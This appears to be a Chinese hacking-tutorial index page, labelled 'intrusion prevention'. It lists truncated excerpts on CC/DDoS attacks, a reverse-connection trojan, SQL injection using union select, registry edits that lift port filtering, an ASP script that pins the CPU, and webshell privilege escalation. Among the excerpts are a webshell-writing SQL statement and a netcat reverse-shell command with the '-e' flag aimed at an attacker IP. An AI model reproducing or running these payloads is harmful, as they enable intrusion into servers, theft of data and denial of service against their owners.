入侵防御

CC攻击（Challenge Collapsar）是DDOS（分布式拒绝服务）的一种，也是一种常见的网站攻击方法，攻击者通过代理服务器或者肉鸡向向受害主机不停地发大量数据包，造成对方服务器资源耗尽，一直到宕机崩溃。 　　CC攻击的攻击技术含量低，利用工...

一个14岁的男孩经过无数次的实验，推出了一款全新的木马——SUF 1.0，该后门运用了“反弹端口原理”与“FTP 隧道技术”，也就是两台机器不直接传输数据，而是利用第三台机器（FT...

SQL注入攻击的种类 　　知彼知己，方可取胜。首先要清楚SQL注入攻击有哪些种类。 　　1.没有正确过滤转义字符 　　在用户的输入没有为转义字符过滤时，就会发生这种形式的注入式攻击，它会被传递给一个SQL语句。这样就会导致应用程序的终端用户对数据库上的...

利用Information_schema系统库来注入,配合使用group_concat()函数,group_concat()功能强大,而且能够绕过limit限制 http://127.0.0.1/sql.php?id=1 union select 0,...

有时候服务器管理员会用TCP/IP筛选限制端口，让我们无法登陆3389等等需要解除这一限制，只需要导出注册表进行修改就行了： TCP/IP筛选在注册表里有三处，分别是：HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\...

1、连接到对方MYSQL 服务器 　　 mysql -u root -h 192.168.0.1 　　 mysql.exe 这个程序在你安装了MYSQL的的BIN目录中 2、让我们来看看服务器中有些什么数据库 　　 mysql>show data...

原理就是通过执行死循环导致cpu跑满，不得不重启服务器，windows系统下可以通过停止w3wp.exe的方法解决，然后重启iis什么的把下面的代码保存为chongqi.asp，然后在访问，会占用CPU很高，管理员会重启。 复制代码 代码如下: <...

一些常用的sql注入语句。下面我将介绍如何使用手工注入MYSQL,MSSQL数据库. 一般漏洞产生的原因 : 程序执行中未对敏感字符进行过滤,使得攻击者传入恶意字符串与结构化数据查询语句合并,并且执行恶意代码. 创建text数据表MYSQL代码: 复制...

需要什么条件，语句又是什么？网上翻不到资料。麻烦各位。 答： create table cmd (a varchar(50)) insert into cmd (a) values (\'<%execute request("a&quo...

webshell提权小技巧 cmd路径: c:\\windows\\temp\\cmd.exe nc也在同目录下 例如反弹cmdshell： "c:\\windows\\temp\\nc.exe -vv ip 999 -e c:\\windo...

在webshell下执行CMD，按照常规： path:c:\\windows\\temp\\cmd.exe 查用户： Command: /c net user 这个情况是system32目录的net.exe 你能调用到。 要是调用不到，只能传文件到执行...

1、利用Sc getkeyname来获取服务的名字 首先我们可以利用 net start 来得到系统中的服务显示名称 然后我们利用 sc getkeyname 来得到服务的真实名称 这样我们就得到了服务的真实名称，然后我们利用 net stop 服务名...